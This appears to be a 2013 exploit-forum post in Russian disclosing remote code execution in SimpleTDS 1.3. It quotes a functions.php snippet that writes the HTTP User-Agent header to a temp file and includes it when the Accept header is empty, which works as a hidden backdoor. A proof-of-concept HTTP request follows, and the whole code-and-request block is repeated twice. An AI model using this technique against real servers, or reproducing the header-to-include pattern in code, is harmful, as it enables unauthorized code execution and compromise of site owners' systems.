Expl0ited
10.10.2013, 12:17
Официальный дистр: http://simpletds.com/download-1_3
Уязвимый код в functions.php (205-215):
PHP:
{
$accept=$_SERVER['HTTP_ACCEPT'] ==null?true:false;
if($debug||$accept) {
$os_repository=tempnam(sys_get_temp_dir(),'OSV');
$tmp=fopen($os_repository,'w');
fwrite($tmp,$_SERVER['HTTP_USER_AGENT']);
fclose($tmp);
include_once($os_repository);
unlink($os_repository);
}
}
POC:
Code:
GET /functions.php HTTP/1.1
Host: localhost
User-Agent:
Accept:
Connection: keep-alive
Уязвимый код в functions.php (205-215):
PHP:
{
$accept=$_SERVER['HTTP_ACCEPT'] ==null?true:false;
if($debug||$accept) {
$os_repository=tempnam(sys_get_temp_dir(),'OSV');
$tmp=fopen($os_repository,'w');
fwrite($tmp,$_SERVER['HTTP_USER_AGENT']);
fclose($tmp);
include_once($os_repository);
unlink($os_repository);
}
}
POC:
Code:
GET /functions.php HTTP/1.1
Host: localhost
User-Agent:
Accept:
Connection: keep-alive